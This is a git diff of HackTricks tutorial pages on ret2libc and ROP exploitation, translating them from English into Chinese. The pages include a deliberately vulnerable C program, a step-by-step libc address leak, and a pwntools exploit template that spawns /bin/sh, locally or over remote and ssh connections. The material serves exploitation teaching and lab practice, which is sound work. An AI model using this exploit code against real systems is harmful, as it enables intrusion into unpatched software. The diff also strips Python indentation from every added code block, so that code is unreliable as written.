-
-Check the example from:
+查看以下示例：
 
 {{#ref}}
 ../rop-return-oriented-programing.md
 {{#endref}}
 
-## Ret-into-printf (or puts)
+## Ret-into-printf (或 puts)
 
-This allows to **leak information from the process** by calling `printf`/`puts` with some specific data placed as an argument.
+这允许通过调用 `printf`/`puts` 并将一些特定数据作为参数传递来**泄露进程信息**。
 
 ## Ret2printf
 
-This basically means abusing a **Ret2lib to transform it into a `printf` format strings vulnerability** by using the `ret2lib` to call printf with the values to exploit it (sounds useless but possible):
+这基本上意味着滥用 **Ret2lib 将其转变为 `printf` 格式字符串漏洞**，通过使用 `ret2lib` 调用 printf 并利用其值（听起来没用但可能）：
 
 {{#ref}}
 ../../format-strings/
 {{#endref}}
 
-## Other Examples & references
+## 其他示例和参考
 
 - [https://guyinatuxedo.github.io/08-bof_dynamic/csaw19_babyboi/index.html](https://guyinatuxedo.github.io/08-bof_dynamic/csaw19_babyboi/index.html)
-  - Ret2lib, given a leak to the address of a function in libc, using one gadget
+- Ret2lib，给出 libc 中一个函数的地址泄露，使用一个 gadget
 - [https://guyinatuxedo.github.io/08-bof_dynamic/csawquals17_svc/index.html](https://guyinatuxedo.github.io/08-bof_dynamic/csawquals17_svc/index.html)
-  - 64 bit, ASLR enabled but no PIE, the first step is to fill an overflow until the byte 0x00 of the canary to then call puts and leak it. With the canary a ROP gadget is created to call puts to leak the address of puts from the GOT and the a ROP gadget to call `system('/bin/sh')`
+- 64 位，启用 ASLR 但没有 PIE，第一步是填充溢出直到 canary 的字节 0x00，然后调用 puts 并泄露它。使用 canary 创建一个 ROP gadget 来调用 puts 以泄露 GOT 中 puts 的地址，然后再调用 `system('/bin/sh')` 的 ROP gadget。
 - [https://guyinatuxedo.github.io/08-bof_dynamic/fb19_overfloat/index.html](https://guyinatuxedo.github.io/08-bof_dynamic/fb19_overfloat/index.html)
-  - 64 bits, ASLR enabled, no canary, stack overflow in main from a child function. ROP gadget to call puts to leak the address of puts from the GOT and then call an one gadget.
+- 64 位，启用 ASLR，没有 canary，主函数中的堆栈溢出来自子函数。ROP gadget 调用 puts 以泄露 GOT 中 puts 的地址，然后调用一个 gadget。
 - [https://guyinatuxedo.github.io/08-bof_dynamic/hs19_storytime/index.html](https://guyinatuxedo.github.io/08-bof_dynamic/hs19_storytime/index.html)
-  - 64 bits, no pie, no canary, no relro, nx. Uses write function to leak the address of write (libc) and calls one gadget.
+- 64 位，没有 pie，没有 canary，没有 relro，nx。使用 write 函数泄露 write（libc）的地址并调用一个 gadget。
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/rop-leaking-libc-address/README.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/rop-leaking-libc-address/README.md
index 290f5e1e9..868084387 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/rop-leaking-libc-address/README.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/rop-leaking-libc-address/README.md
@@ -1,85 +1,78 @@
-# Leaking libc address with ROP
+# 使用 ROP 泄露 libc 地址
 
 {{#include ../../../../../banners/hacktricks-training.md}}
 
-## Quick Resume
+## 快速总结
 
-1. **Find** overflow **offset**
-2. **Find** `POP_RDI` gadget, `PUTS_PLT` and `MAIN`
-3. Use previous gadgets lo **leak the memory address** of puts or another libc function and **find the libc version** ([donwload it](https://libc.blukat.me))
-4. With the library, **calculate the ROP and exploit it**
+1. **找到** 溢出 **偏移**
+2. **找到** `POP_RDI` gadget, `PUTS_PLT` 和 `MAIN`
+3. 使用之前的 gadgets **泄露 puts 或其他 libc 函数的内存地址** 并 **找到 libc 版本** ([donwload it](https://libc.blukat.me))
+4. 使用库，**计算 ROP 并进行利用**
 
-## Other tutorials and binaries to practice
+## 其他教程和二进制文件以供练习
 
-This tutorial is going to exploit the code/binary proposed in this tutorial: [https://tasteofsecurity.com/security/ret2libc-unknown-libc/](https://tasteofsecurity.com/security/ret2libc-unknown-libc/)\
-Another useful tutorials: [https://made0x78.com/bseries-ret2libc/](https://made0x78.com/bseries-ret2libc/), [https://guyinatuxedo.github.io/08-bof_dynamic/csaw19_babyboi/index.html](https://guyinatuxedo.github.io/08-bof_dynamic/csaw19_babyboi/index.html)
+本教程将利用本教程中提出的代码/二进制文件：[https://tasteofsecurity.com/security/ret2libc-unknown-libc/](https://tasteofsecurity.com/security/ret2libc-unknown-libc/)\
+另一个有用的教程：[https://made0x78.com/bseries-ret2libc/](https://made0x78.com/bseries-ret2libc/), [https://guyinatuxedo.github.io/08-bof_dynamic/csaw19_babyboi/index.html](https://guyinatuxedo.github.io/08-bof_dynamic/csaw19_babyboi/index.html)
 
-## Code
-
-Filename: `vuln.c`
+## 代码
 
+文件名: `vuln.c`
 ```c
 #include <stdio.h>
 
 int main() {
-    char buffer[32];
-    puts("Simple ROP.\n");
-    gets(buffer);
+char buffer[32];
+puts("Simple ROP.\n");
+gets(buffer);
 
-    return 0;
+return 0;
 }
 ```
 
 ```bash
 gcc -o vuln vuln.c -fno-stack-protector -no-pie
 ```
+## ROP - 泄露 LIBC 模板
 
-## ROP - Leaking LIBC template
-
-I'm going to use the code located here to make the exploit.\
-Download the exploit and place it in the same directory as the vulnerable binary and give the needed data to the script:
+我将使用这里的代码来制作漏洞利用程序。\
+下载漏洞利用程序并将其放在与易受攻击的二进制文件相同的目录中，并向脚本提供所需的数据：
 
 {{#ref}}
 rop-leaking-libc-template.md
 {{#endref}}
 
-## 1- Finding the offset
-
-The template need an offset before continuing with the exploit. If any is provided it will execute the necessary code to find it (by default `OFFSET = ""`):
+## 1- 查找偏移量
 
+模板在继续进行漏洞利用之前需要一个偏移量。如果提供了任何偏移量，它将执行必要的代码来查找它（默认 `OFFSET = ""`）：
 ```bash
 ###################
 ### Find offset ###
 ###################
 OFFSET = ""#"A"*72
 if OFFSET == "":
-    gdb.attach(p.pid, "c") #Attach and continue
-    payload = cyclic(1000)
-    print(r.clean())
-    r.sendline(payload)
-    #x/wx $rsp -- Search for bytes that crashed the application
-    #cyclic_find(0x6161616b) # Find the offset of those bytes
-    return
+gdb.attach(p.pid, "c") #Attach and continue
+payload = cyclic(1000)
+print(r.clean())
+r.sendline(payload)
+#x/wx $rsp -- Search for bytes that crashed the application
+#cyclic_find(0x6161616b) # Find the offset of those bytes
+return
 ```
-
-**Execute** `python template.py` a GDB console will be opened with the program being crashed. Inside that **GDB console** execute `x/wx $rsp` to get the **bytes** that were going to overwrite the RIP. Finally get the **offset** using a **python** console:
-
+**执行** `python template.py` 将打开一个 GDB 控制台，程序将崩溃。在该 **GDB 控制台** 中执行 `x/wx $rsp` 以获取将要覆盖 RIP 的 **字节**。最后使用 **python** 控制台获取 **偏移量**：
 ```python
 from pwn import *
 cyclic_find(0x6161616b)
 ```
-
 ![](<../../../../../images/image (140).png>)
 
-After finding the offset (in this case 40) change the OFFSET variable inside the template using that value.\
+在找到偏移量（在这种情况下为 40）后，使用该值更改模板中的 OFFSET 变量。\
 `OFFSET = "A" * 40`
 
-Another way would be to use: `pattern create 1000` -- _execute until ret_ -- `pattern seach $rsp` from GEF.
+另一种方法是使用： `pattern create 1000` -- _执行直到 ret_ -- `pattern seach $rsp` 从 GEF。
 
-## 2- Finding Gadgets
-
-Now we need to find ROP gadgets inside the binary. This ROP gadgets will be useful to call `puts`to find the **libc** being used, and later to **launch the final exploit**.
+## 2- 查找小工具
 
+现在我们需要在二进制文件中查找 ROP 小工具。这些 ROP 小工具将用于调用 `puts` 以查找正在使用的 **libc**，并随后 **启动最终利用**。
 ```python
 PUTS_PLT = elf.plt['puts'] #PUTS_PLT = elf.symbols["puts"] # This is also valid to call puts
 MAIN_PLT = elf.symbols['main']
@@ -90,108 +83,98 @@ log.info("Main start: " + hex(MAIN_PLT))
 log.info("Puts plt: " + hex(PUTS_PLT))
 log.info("pop rdi; ret  gadget: " + hex(POP_RDI))
 ```
+`PUTS_PLT` 是调用 **function puts** 所需的。\
+`MAIN_PLT` 是在一次交互后再次调用 **main function** 所需的，以便 **exploit** 溢出 **again**（无限轮次的利用）。**它在每个 ROP 的末尾用于再次调用程序**。\
+**POP_RDI** 是需要 **pass** 一个 **parameter** 给被调用的函数。
 
-The `PUTS_PLT` is needed to call the **function puts**.\
-The `MAIN_PLT` is needed to call the **main function** again after one interaction to **exploit** the overflow **again** (infinite rounds of exploitation). **It is used at the end of each ROP to call the program again**.\
-The **POP_RDI** is needed to **pass** a **parameter** to the called function.
+在这一步中，你不需要执行任何操作，因为所有内容将在执行过程中由 pwntools 找到。
 
-In this step you don't need to execute anything as everything will be found by pwntools during the execution.
-
-## 3- Finding libc library
-
-Now is time to find which version of the **libc** library is being used. To do so we are going to **leak** the **address** in memory of the **function** `puts`and then we are going to **search** in which **library version** the puts version is in that address.
+## 3- 查找 libc 库
 
+现在是时候找出正在使用哪个版本的 **libc** 库了。为此，我们将 **leak** **function** `puts` 在内存中的 **address**，然后我们将 **search** 该地址中 puts 版本所在的 **library version**。
 ```python
 def get_addr(func_name):
-    FUNC_GOT = elf.got[func_name]
-    log.info(func_name + " GOT @ " + hex(FUNC_GOT))
-    # Create rop chain
-    rop1 = OFFSET + p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
+FUNC_GOT = elf.got[func_name]
+log.info(func_name + " GOT @ " + hex(FUNC_GOT))
+# Create rop chain
+rop1 = OFFSET + p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
 
-    #Send our rop-chain payload
-    #p.sendlineafter("dah?", rop1) #Interesting to send in a specific moment
-    print(p.clean()) # clean socket buffer (read all and print)
-    p.sendline(rop1)
+#Send our rop-chain payload
+#p.sendlineafter("dah?", rop1) #Interesting to send in a specific moment
+print(p.clean()) # clean socket buffer (read all and print)
+p.sendline(rop1)
 
-    #Parse leaked address
-    recieved = p.recvline().strip()
-    leak = u64(recieved.ljust(8, "\x00"))
-    log.info("Leaked libc address,  "+func_name+": "+ hex(leak))
-    #If not libc yet, stop here
-    if libc != "":
-        libc.address = leak - libc.symbols[func_name] #Save libc base
-        log.info("libc base @ %s" % hex(libc.address))
+#Parse leaked address
+recieved = p.recvline().strip()
+leak = u64(recieved.ljust(8, "\x00"))
+log.info("Leaked libc address,  "+func_name+": "+ hex(leak))
+#If not libc yet, stop here
+if libc != "":
+libc.address = leak - libc.symbols[func_name] #Save libc base
+log.info("libc base @ %s" % hex(libc.address))
 
-    return hex(leak)
+return hex(leak)
 
 get_addr("puts") #Search for puts address in memmory to obtains libc base
 if libc == "":
-    print("Find the libc library and continue with the exploit... (https://libc.blukat.me/)")
-    p.interactive()
+print("Find the libc library and continue with the exploit... (https://libc.blukat.me/)")
+p.interactive()
 ```
-
-To do so, the most important line of the executed code is:
-
+要做到这一点，执行代码中最重要的一行是：
 ```python
 rop1 = OFFSET + p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
 ```
+这将发送一些字节，直到**覆盖****RIP**为止：`OFFSET`。\
+然后，它将设置小工具`POP_RDI`的**地址**，以便下一个地址（`FUNC_GOT`）将被保存在**RDI**寄存器中。这是因为我们想要**调用puts**，**传递**它`PUTS_GOT`的**地址**，因为puts函数在内存中的地址保存在指向`PUTS_GOT`的地址中。\
+之后，将调用`PUTS_PLT`（**RDI**中包含`PUTS_GOT`），因此puts将**读取**`PUTS_GOT`中的内容（**puts函数在内存中的地址**）并**打印出来**。\
+最后，**再次调用主函数**，以便我们可以再次利用溢出。
 
-This will send some bytes util **overwriting** the **RIP** is possible: `OFFSET`.\
-Then, it will set the **address** of the gadget `POP_RDI` so the next address (`FUNC_GOT`) will be saved in the **RDI** registry. This is because we want to **call puts** **passing** it the **address** of the `PUTS_GOT`as the address in memory of puts function is saved in the address pointing by `PUTS_GOT`.\
-After that, `PUTS_PLT` will be called (with `PUTS_GOT` inside the **RDI**) so puts will **read the content** inside `PUTS_GOT` (**the address of puts function in memory**) and will **print it out**.\
-Finally, **main function is called again** so we can exploit the overflow again.
-
-This way we have **tricked puts function** to **print** out the **address** in **memory** of the function **puts** (which is inside **libc** library). Now that we have that address we can **search which libc version is being used**.
+通过这种方式，我们已经**欺骗了puts函数**，使其**打印**出**内存**中**puts**函数的**地址**（该函数位于**libc**库中）。现在我们有了这个地址，我们可以**搜索正在使用的libc版本**。
 
 ![](<../../../../../images/image (141).png>)
 
-As we are **exploiting** some **local** binary it is **not needed** to figure out which version of **libc** is being used (just find the library in `/lib/x86_64-linux-gnu/libc.so.6`).\
-But, in a remote exploit case I will explain here how can you find it:
+由于我们正在**利用**某个**本地**二进制文件，因此**不需要**弄清楚正在使用哪个版本的**libc**（只需在`/lib/x86_64-linux-gnu/libc.so.6`中找到库）。\
+但是，在远程利用的情况下，我将在这里解释如何找到它：
 
-### 3.1- Searching for libc version (1)
+### 3.1- 搜索libc版本 (1)
 
-You can search which library is being used in the web page: [https://libc.blukat.me/](https://libc.blukat.me)\
-It will also allow you to download the discovered version of **libc**
+您可以在网页上搜索正在使用的库：[https://libc.blukat.me/](https://libc.blukat.me)\
+它还允许您下载发现的**libc**版本。
 
 ![](<../../../../../images/image (142).png>)
 
-### 3.2- Searching for libc version (2)
+### 3.2- 搜索libc版本 (2)
 
-You can also do:
+您还可以执行：
 
 - `$ git clone https://github.com/niklasb/libc-database.git`
 - `$ cd libc-database`
 - `$ ./get`
 
-This will take some time, be patient.\
-For this to work we need:
+这将需要一些时间，请耐心等待。\
+为了使其工作，我们需要：
 
-- Libc symbol name: `puts`
-- Leaked libc adddress: `0x7ff629878690`
-
-We can figure out which **libc** that is most likely used.
+- Libc符号名称：`puts`
+- 泄露的libc地址：`0x7ff629878690`
 
+我们可以找出最有可能使用的**libc**。
 ```bash
 ./find puts 0x7ff629878690
 ubuntu-xenial-amd64-libc6 (id libc6_2.23-0ubuntu10_amd64)
 archive-glibc (id libc6_2.23-0ubuntu11_amd64)
 ```
-
-We get 2 matches (you should try the second one if the first one is not working). Download the first one:
-
+我们得到了两个匹配（如果第一个不工作，你应该尝试第二个）。下载第一个：
 ```bash
 ./download libc6_2.23-0ubuntu10_amd64
 Getting libc6_2.23-0ubuntu10_amd64
-  -> Location: http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6_2.23-0ubuntu10_amd64.deb
-  -> Downloading package
-  -> Extracting package
-  -> Package saved to libs/libc6_2.23-0ubuntu10_amd64
+-> Location: http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6_2.23-0ubuntu10_amd64.deb
+-> Downloading package
+-> Extracting package
+-> Package saved to libs/libc6_2.23-0ubuntu10_amd64
 ```
+将 `libs/libc6_2.23-0ubuntu10_amd64/libc-2.23.so` 中的 libc 复制到我们的工作目录。
 
-Copy the libc from `libs/libc6_2.23-0ubuntu10_amd64/libc-2.23.so` to our working directory.
-
-### 3.3- Other functions to leak
-
+### 3.3- 其他泄露函数
 ```python
 puts
 printf
@@ -199,28 +182,24 @@ __libc_start_main
 read
 gets
 ```
+## 4- 查找基于 libc 的地址和利用
 
-## 4- Finding based libc address & exploiting
+在这一点上，我们应该知道使用的 libc 库。由于我们正在利用一个本地二进制文件，我将使用：`/lib/x86_64-linux-gnu/libc.so.6`
 
-At this point we should know the libc library used. As we are exploiting a local binary I will use just:`/lib/x86_64-linux-gnu/libc.so.6`
+因此，在 `template.py` 的开头将 **libc** 变量更改为： `libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") #设置库路径当知道它时`
 
-So, at the beginning of `template.py` change the **libc** variable to: `libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") #Set library path when know it`
-
-Giving the **path** to the **libc library** the rest of the **exploit is going to be automatically calculated**.
-
-Inside the `get_addr`function the **base address of libc** is going to be calculated:
+给 **libc 库** 提供 **路径** 后，**其余的利用将会自动计算**。
 
+在 `get_addr` 函数内部，**libc 的基地址** 将被计算：
 ```python
 if libc != "":
-    libc.address = leak - libc.symbols[func_name] #Save libc base
-    log.info("libc base @ %s" % hex(libc.address))
+libc.address = leak - libc.symbols[func_name] #Save libc base
+log.info("libc base @ %s" % hex(libc.address))
 ```
-
 > [!NOTE]
-> Note that **final libc base address must end in 00**. If that's not your case you might have leaked an incorrect library.
-
-Then, the address to the function `system` and the **address** to the string _"/bin/sh"_ are going to be **calculated** from the **base address** of **libc** and given the **libc library.**
+> 请注意，**最终的 libc 基地址必须以 00 结尾**。如果不是这种情况，您可能泄露了不正确的库。
 
+然后，函数 `system` 的地址和字符串 _"/bin/sh"_ 的 **地址**将从 **libc** 的 **基地址** 计算得出，并给出 **libc 库。**
 ```python
 BINSH = next(libc.search("/bin/sh")) - 64 #Verify with find /bin/sh
 SYSTEM = libc.sym["system"]
@@ -229,9 +208,7 @@ EXIT = libc.sym["exit"]
 log.info("bin/sh %s " % hex(BINSH))
 log.info("system %s " % hex(SYSTEM))
 ```
-
-Finally, the /bin/sh execution exploit is going to be prepared sent:
-
+最后，将准备发送 /bin/sh 执行漏洞：
 ```python
 rop2 = OFFSET + p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) + p64(EXIT)
 
@@ -241,66 +218,56 @@ p.sendline(rop2)
 #### Interact with the shell #####
 p.interactive() #Interact with the conenction
 ```
+让我们解释一下这个最终的 ROP。\
+最后的 ROP (`rop1`) 再次调用了主函数，然后我们可以 **再次利用** 这个 **溢出**（这就是 `OFFSET` 再次出现的原因）。然后，我们想要调用 `POP_RDI` 指向 _"/bin/sh"_ 的 **地址** (`BINSH`)，并调用 **system** 函数 (`SYSTEM`)，因为 _"/bin/sh"_ 的地址将作为参数传递。\
+最后，**退出函数的地址** 被 **调用**，这样进程 **优雅地退出**，不会生成任何警报。
 
-Let's explain this final ROP.\
-The last ROP (`rop1`) ended calling again the main function, then we can **exploit again** the **overflow** (that's why the `OFFSET` is here again). Then, we want to call `POP_RDI` pointing to the **addres** of _"/bin/sh"_ (`BINSH`) and call **system** function (`SYSTEM`) because the address of _"/bin/sh"_ will be passed as a parameter.\
-Finally, the **address of exit function** is **called** so the process **exists nicely** and any alert is generated.
-
-**This way the exploit will execute a \_/bin/sh**\_\*\* shell.\*\*
+**这样，利用将执行一个 \_/bin/sh**\_\*\* shell.\*\*
 
 ![](<../../../../../images/image (143).png>)
 
-## 4(2)- Using ONE_GADGET
+## 4(2)- 使用 ONE_GADGET
 
-You could also use [**ONE_GADGET** ](https://github.com/david942j/one_gadget)to obtain a shell instead of using **system** and **"/bin/sh". ONE_GADGET** will find inside the libc library some way to obtain a shell using just one **ROP address**.\
-However, normally there are some constrains, the most common ones and easy to avoid are like `[rsp+0x30] == NULL` As you control the values inside the **RSP** you just have to send some more NULL values so the constrain is avoided.
+你也可以使用 [**ONE_GADGET** ](https://github.com/david942j/one_gadget) 来获取一个 shell，而不是使用 **system** 和 **"/bin/sh"**。**ONE_GADGET** 将在 libc 库中找到一些方法，只需使用一个 **ROP 地址** 即可获得一个 shell。\
+然而，通常会有一些限制，最常见且容易避免的限制是 `[rsp+0x30] == NULL`。由于你控制 **RSP** 中的值，你只需发送更多的 NULL 值，以避免这个限制。
 
 ![](<../../../../../images/image (615).png>)
-
 ```python
 ONE_GADGET = libc.address + 0x4526a
 rop2 = base + p64(ONE_GADGET) + "\x00"*100
 ```
-
 ## EXPLOIT FILE
 
-You can find a template to exploit this vulnerability here:
+您可以在此处找到利用此漏洞的模板：
 
 {{#ref}}
 rop-leaking-libc-template.md
 {{#endref}}
 
-## Common problems
+## 常见问题
 
-### MAIN_PLT = elf.symbols\['main'] not found
-
-If the "main" symbol does not exist. Then you can find where is the main code:
+### MAIN_PLT = elf.symbols\['main'] 未找到
 
+如果“main”符号不存在。然后您可以找到主代码的位置：
 ```python
 objdump -d vuln_binary | grep "\.text"
 Disassembly of section .text:
 0000000000401080 <.text>:
 ```
-
-and set the address manually:
-
+并手动设置地址：
 ```python
 MAIN_PLT = 0x401080
 ```
+### Puts未找到
 
-### Puts not found
+如果二进制文件没有使用Puts，您应该检查它是否使用
 
-If the binary is not using Puts you should check if it is using
+### `sh: 1: %s%s%s%s%s%s%s%s: 未找到`
 
-### `sh: 1: %s%s%s%s%s%s%s%s: not found`
-
-If you find this **error** after creating **all** the exploit: `sh: 1: %s%s%s%s%s%s%s%s: not found`
-
-Try to **subtract 64 bytes to the address of "/bin/sh"**:
+如果在创建**所有**漏洞利用后发现此**错误**：`sh: 1: %s%s%s%s%s%s%s%s: 未找到`
 
+尝试**从“/bin/sh”的地址中减去64字节**：
 ```python
 BINSH = next(libc.search("/bin/sh")) - 64
 ```
-
 {{#include ../../../../../banners/hacktricks-training.md}}
-
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md
index 06dcb8f9c..a71c851bf 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md
@@ -1,5 +1,4 @@
 {{#include ../../../../../banners/hacktricks-training.md}}
-
 ```python:template.py
 from pwn import ELF, process, ROP, remote, ssh, gdb, cyclic, cyclic_find, log, p64, u64  # Import pwntools
 
@@ -19,25 +18,25 @@ LIBC = "" #ELF("/lib/x86_64-linux-gnu/libc.so.6") #Set library path when know it
 ENV = {"LD_PRELOAD": LIBC} if LIBC else {}
 
 if LOCAL:
-    P = process(LOCAL_BIN, env=ENV) # start the vuln binary
-    ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
-    ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
+P = process(LOCAL_BIN, env=ENV) # start the vuln binary
+ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
+ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
 
 elif REMOTETTCP:
-    P = remote('10.10.10.10',1339) # start the vuln binary
-    ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
-    ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
+P = remote('10.10.10.10',1339) # start the vuln binary
+ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
+ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
 
 elif REMOTESSH:
-    ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220)
-    p = ssh_shell.process(REMOTE_BIN) # start the vuln binary
-    elf = ELF(LOCAL_BIN)# Extract data from binary
-    rop = ROP(elf)# Find ROP gadgets
+ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220)
+p = ssh_shell.process(REMOTE_BIN) # start the vuln binary
+elf = ELF(LOCAL_BIN)# Extract data from binary
+rop = ROP(elf)# Find ROP gadgets
 
 if GDB and not REMOTETTCP and not REMOTESSH:
-    # attach gdb and continue
-    # You can set breakpoints, for example "break *main"
-    gdb.attach(P.pid, "b *main")
+# attach gdb and continue
+# You can set breakpoints, for example "break *main"
+gdb.attach(P.pid, "b *main")
 
 
 
@@ -47,15 +46,15 @@ if GDB and not REMOTETTCP and not REMOTESSH:
 
 OFFSET = b"" #b"A"*264
 if OFFSET == b"":
-    gdb.attach(P.pid, "c") #Attach and continue
-    payload = cyclic(264)
-    payload += b"AAAAAAAA"
-    print(P.clean())
-    P.sendline(payload)
-    #x/wx $rsp -- Search for bytes that crashed the application
-    #print(cyclic_find(0x63616171)) # Find the offset of those bytes
-    P.interactive()
-    exit()
+gdb.attach(P.pid, "c") #Attach and continue
+payload = cyclic(264)
+payload += b"AAAAAAAA"
+print(P.clean())
+P.sendline(payload)
+#x/wx $rsp -- Search for bytes that crashed the application
+#print(cyclic_find(0x63616171)) # Find the offset of those bytes
+P.interactive()
+exit()
 
 
 
@@ -63,11 +62,11 @@ if OFFSET == b"":
 ### Find Gadgets ###
 ####################
 try:
-    libc_func = "puts"
-    PUTS_PLT = ELF_LOADED.plt['puts'] #PUTS_PLT = ELF_LOADED.symbols["puts"] # This is also valid to call puts
+libc_func = "puts"
+PUTS_PLT = ELF_LOADED.plt['puts'] #PUTS_PLT = ELF_LOADED.symbols["puts"] # This is also valid to call puts
 except:
-    libc_func = "printf"
-    PUTS_PLT = ELF_LOADED.plt['printf']
+libc_func = "printf"
+PUTS_PLT = ELF_LOADED.plt['printf']
 
 MAIN_PLT = ELF_LOADED.symbols['main']
 POP_RDI = (ROP_LOADED.find_gadget(['pop rdi', 'ret']))[0] #Same as ROPgadget --binary vuln | grep "pop rdi"
@@ -84,54 +83,54 @@ log.info("ret gadget: " + hex(RET))
 ########################
 
 def generate_payload_aligned(rop):
-    payload1 = OFFSET + rop
-    if (len(payload1) % 16) == 0:
-        return payload1
+payload1 = OFFSET + rop
+if (len(payload1) % 16) == 0:
+return payload1
 
-    else:
-        payload2 = OFFSET + p64(RET) + rop
-        if (len(payload2) % 16) == 0:
-            log.info("Payload aligned successfully")
-            return payload2
-        else:
-            log.warning(f"I couldn't align the payload! Len: {len(payload1)}")
-            return payload1
+else:
+payload2 = OFFSET + p64(RET) + rop
+if (len(payload2) % 16) == 0:
+log.info("Payload aligned successfully")
+return payload2
+else:
+log.warning(f"I couldn't align the payload! Len: {len(payload1)}")
+return payload1
 
 
 def get_addr(libc_func):
-    FUNC_GOT = ELF_LOADED.got[libc_func]
-    log.info(libc_func + " GOT @ " + hex(FUNC_GOT))
-    # Create rop chain
-    rop1 = p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
-    rop1 = generate_payload_aligned(rop1)
+FUNC_GOT = ELF_LOADED.got[libc_func]
+log.info(libc_func + " GOT @ " + hex(FUNC_GOT))
+# Create rop chain
+rop1 = p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
+rop1 = generate_payload_aligned(rop1)
 
-    # Send our rop-chain payload
-    #P.sendlineafter("dah?", rop1) #Use this to send the payload when something is received
-    print(P.clean()) # clean socket buffer (read all and print)
-    P.sendline(rop1)
+# Send our rop-chain payload
+#P.sendlineafter("dah?", rop1) #Use this to send the payload when something is received
+print(P.clean()) # clean socket buffer (read all and print)
+P.sendline(rop1)
 
-    # If binary is echoing back the payload, remove that message
-    recieved = P.recvline().strip()
-    if OFFSET[:30] in recieved:
-        recieved = P.recvline().strip()
+# If binary is echoing back the payload, remove that message
+recieved = P.recvline().strip()
+if OFFSET[:30] in recieved:
+recieved = P.recvline().strip()
 
-    # Parse leaked address
-    log.info(f"Len rop1: {len(rop1)}")
-    leak = u64(recieved.ljust(8, b"\x00"))
-    log.info(f"Leaked LIBC address,  {libc_func}: {hex(leak)}")
+# Parse leaked address
+log.info(f"Len rop1: {len(rop1)}")
+leak = u64(recieved.ljust(8, b"\x00"))
+log.info(f"Leaked LIBC address,  {libc_func}: {hex(leak)}")
 
-    # Set lib base address
-    if LIBC:
-        LIBC.address = leak - LIBC.symbols[libc_func] #Save LIBC base
-        print("If LIBC base doesn't end end 00, you might be using an icorrect libc library")
-        log.info("LIBC base @ %s" % hex(LIBC.address))
+# Set lib base address
+if LIBC:
+LIBC.address = leak - LIBC.symbols[libc_func] #Save LIBC base
+print("If LIBC base doesn't end end 00, you might be using an icorrect libc library")
+log.info("LIBC base @ %s" % hex(LIBC.address))
 
-    # If not LIBC yet, stop here
-    else:
-        print("TO CONTINUE) Find the LIBC library and continue with the exploit... (https://LIBC.blukat.me/)")
-        P.interactive()
+# If not LIBC yet, stop here
+else:
+print("TO CONTINUE) Find the LIBC library and continue with the exploit... (https://LIBC.blukat.me/)")
+P.interactive()
 
-    return hex(leak)
+return hex(leak)
 
 get_addr(libc_func) #Search for puts address in memmory to obtain LIBC base
 
@@ -144,38 +143,38 @@ get_addr(libc_func) #Search for puts address in memmory to obtain LIBC base
 ## Via One_gadget (https://github.com/david942j/one_gadget)
 # gem install one_gadget
 def get_one_gadgets(libc):
-        import string, subprocess
-	args = ["one_gadget", "-r"]
-	if len(libc) == 40 and all(x in string.hexdigits for x in libc.hex()):
-		args += ["-b", libc.hex()]
-	else:
-		args += [libc]
-	try:
-	    one_gadgets = [int(offset) for offset in subprocess.check_output(args).decode('ascii').strip().split()]
-	except:
-	    print("One_gadget isn't installed")
-	    one_gadgets = []
-	return
+import string, subprocess
+args = ["one_gadget", "-r"]
+if len(libc) == 40 and all(x in string.hexdigits for x in libc.hex()):
+args += ["-b", libc.hex()]
+else:
+args += [libc]
+try:
+one_gadgets = [int(offset) for offset in subprocess.check_output(args).decode('ascii').strip().split()]
+except:
+print("One_gadget isn't installed")
+one_gadgets = []
+return
 
 rop2 = b""
 if USE_ONE_GADGET:
-    one_gadgets = get_one_gadgets(LIBC)
-    if one_gadgets:
-        rop2 = p64(one_gadgets[0]) + "\x00"*100 #Usually this will fullfit the constrains
+one_gadgets = get_one_gadgets(LIBC)
+if one_gadgets:
+rop2 = p64(one_gadgets[0]) + "\x00"*100 #Usually this will fullfit the constrains
 
 ## Normal/Long exploitation
 if not rop2:
-    BINSH = next(LIBC.search(b"/bin/sh")) #Verify with find /bin/sh
-    SYSTEM = LIBC.sym["system"]
-    EXIT = LIBC.sym["exit"]
+BINSH = next(LIBC.search(b"/bin/sh")) #Verify with find /bin/sh
+SYSTEM = LIBC.sym["system"]
+EXIT = LIBC.sym["exit"]
 
-    log.info("POP_RDI %s " % hex(POP_RDI))
